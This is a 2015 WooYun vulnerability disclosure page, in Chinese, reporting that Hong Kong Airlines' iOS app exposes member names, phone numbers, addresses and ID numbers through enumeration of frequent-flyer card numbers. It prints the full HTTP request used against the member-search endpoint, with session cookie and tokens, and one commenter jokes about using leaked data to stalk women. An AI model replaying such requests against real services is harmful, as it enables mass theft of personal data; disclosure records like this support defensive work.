当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128731

漏洞标题:香港航空客户端存在严重设计缺陷可查看任意会员姓名/电话/住址/证件号码

相关厂商:香港航空

漏洞作者: 高小厨

提交时间:2015-07-23 18:09

修复时间:2015-09-07 09:38

公开时间:2015-09-07 09:38

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-08-03: 细节向核心白帽子及相关领域专家公开
2015-08-13: 细节向普通白帽子公开
2015-08-23: 细节向实习白帽子公开
2015-09-07: 细节向公众公开

简要描述:

目测数据量千万级,20rank可好

详细说明:

1、目标:香港航空IOS客户端
2、本来打算绕过签名然后查看用户信息,后来发现根本不需要,直接遍历金鹏会员卡号就可以了,方便快捷

hk04.png


POST http://aio.hkairlines.com/ac3s/fortunewings/searchMember HTTP/1.1
Host: aio.hkairlines.com
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=E5D854D00DEF2D76AF885CE4915646C4
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Language: zh-Hans;q=1, fr;q=0.9, en;q=0.8, de;q=0.7, zh-Hant;q=0.6, ja;q=0.5
Content-Length: 319
Connection: keep-alive
User-Agent: HongKongAirlines/1506091431 (iPhone; iOS 7.0.4; Scale/2.00)
ai.cc=2001&ai.cp=2b504aadcc87a325fe190566d96257c0&bi.av=2.3.1&bi.cl=&bi.cln=&bi.ctoken=79c4be379884f0d42a051a65c2590df1480b11e0&bi.ctype=app&bi.dm=iPhone&bi.dn=iPhone%20OS&bi.dv=iOS&bi.lan=CN&bi.mi=gaotingyuthx%40126.com&bi.ov=7.0.4&bi.sid=f08c9a30eeb4541a3283731412b8649c&cid=3994585113&memberId=gaotingyuthx%40126.com


遍历:

hk1.png

漏洞证明:

IMG_1013.PNG

hk2.png

hk3.png

修复方案:

数据加个签名可好

版权声明:转载请注明来源 高小厨@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-24 09:36

厂商回复:

谢谢,我们会立即组织整改。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-23 18:24 | Looke ( 普通白帽子 | Rank:619 漏洞数:38 | 可顺势而为,何必逆水行舟)

    给我多来几个漂亮妹子的信息,我好去踩踩点